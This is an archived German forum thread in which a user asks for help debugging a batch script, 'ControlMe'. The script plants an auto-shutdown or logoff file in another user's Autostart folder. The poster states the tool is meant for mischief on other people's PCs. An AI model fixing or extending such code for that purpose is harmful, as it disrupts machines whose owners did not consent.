PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : ControlMe - Bitte helfen!



ShockerZz
07.09.2008, 21:32
So, bald poste ich ein Batch-Proggie, das den PC kontrolliert, nennt sich ControlMe. Ich hab allerdings noch ein paar Probleme:
1. Er will 'nen Autoshutdown nicht richtig kopieren (findet Pfad ncith). Hier der dazugehörige Code:


echo Bitte geben Sie den Benutzernamen ein, dem Sie den
echo Auto-Logout/-Shutdown/-Restart hinzufuegen wollen.
echo.
set /p benutzer=Benutzername:
echo Dem Benutzer %benutzer% wurde am %date:~0% um %time:~0,8% Uhr ein Auto-Logout/-Shutdown/-Restart hinzugefuegt. >> %systemroot%\system32\controllerV1.0.log
echo.
echo Bitte waehlen Sie:
echo.
echo Auto-Logout [L]
echo Auto-Shutdown [S]
echo Auto-Restart [R]
echo.
set /p shutdown=Ihre Wahl:
echo.
echo Soll eine Warnung erscheinen? [j/n]
set /p wrnng=Ihre Wahl:
if %wrnng%==j goto autoshutdownx
goto autoshutdownxx

:autoshutdownx
echo.
echo Geben sie den Text ein, der in der Warnung erscheinen soll (max. 127 Zeichen):
set /p txt=
set shutdown2=-c "%txt%"
goto autoshutdownxx

:autoshutdownxx
echo.
echo Geben sie an, nach wie viel Sek. der
echo Auto-Logout/-Shutdown/-Restart erfolgen soll [00 fuer sofort].
set /p count=Zeit (in Sek.):
echo @echo off >> shutdowner.bat
echo shutdown -%shutdown% -t %count% %shutdown2% >> shutdowner.bat
copy shutdowner.bat %homedrive%\dokume~1\%benutzer%\startmenü\program me\autostart\
erase shutdowner.bat
pause >nul
goto menue

Was mach ich falsch? Die Shutdowner.bat erstellt er, nur er findet den Pfad nicht, wohin er sie kopieren soll.

2.Ich hab 'ne Funktion allgemeiner Status, was soll ich da rein machen? Ich hab bisher die Uhrzeit, das Datum, die IP und die bisherigen Änderungen (dafür oben die log-Datei). Was könnte ich noch machen?

Übrigens soll das Programm dazu dienen, an fremden PC's möglichst schnell und einfach viel Unsinn zu treiben^^

Greetz, ShockerZz

Added after 162 hours 56 minutes:

*push*
Kann mir keiner helfen? Dann doch bitte Ideen für's 2. aufzählen, pls.